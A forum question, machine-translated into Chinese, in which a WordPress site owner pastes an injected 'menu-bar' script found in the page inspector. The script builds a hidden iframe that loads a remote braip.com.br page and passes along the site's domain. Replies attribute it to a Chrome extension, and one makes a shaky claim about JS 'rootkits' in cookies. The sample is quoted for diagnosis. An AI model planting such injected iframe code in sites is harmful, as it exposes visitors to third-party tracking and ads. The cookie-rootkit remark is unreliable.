你好,我的网站上有恶意脚本,我无法在任何地方找到它!Wordpress中的恶意脚本
我在检查检查,它返回:
<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div>
<div id="abrir_aba"></div>
<div class="handle"></div>
<script type="text/javascript">
var relatedUrl = document.domain;
var protocol = window.location.protocol;
var idadv = document.createElement("iframe");
with(idadv){
id = "idadv";
src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl;
scrolling = "no";
}
document.getElementById("menu-bar").appendChild(idadv);
</script>
<script type="text/javascript">
$("#menu-bar").slideReveal({
trigger: $(".handle"),
push: false,
position: "right",
width: 50,
show: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"});
},
hidden: function(slider, trigger){
$('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"});
},
});
</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url=www.websiteladies.com" scrolling="no"></iframe></div>
它坐落在我的wordpress的“菜单栏”,但我到处都找不到的东西!这样,我的网站的SSL证书,使我的网站显示为我的客户的INSECURE!我不能相信 !
这里是网址:http://www.websiteladies.com
任何帮助吗?
感谢您的信息,这是一个Chrome插件!不敢相信! – FrenchyNYC
@FrenchyNYC。不客气。 Google Chrome浏览器是我最喜欢的浏览器,这很遗憾,但它非常容易受到基于JS的rootkit的影响。一年前,我在“cookie”罐子里发现了其中的231个。我现在经常擦拭缓存和cookie jar,就像每周一次。 – Sparky256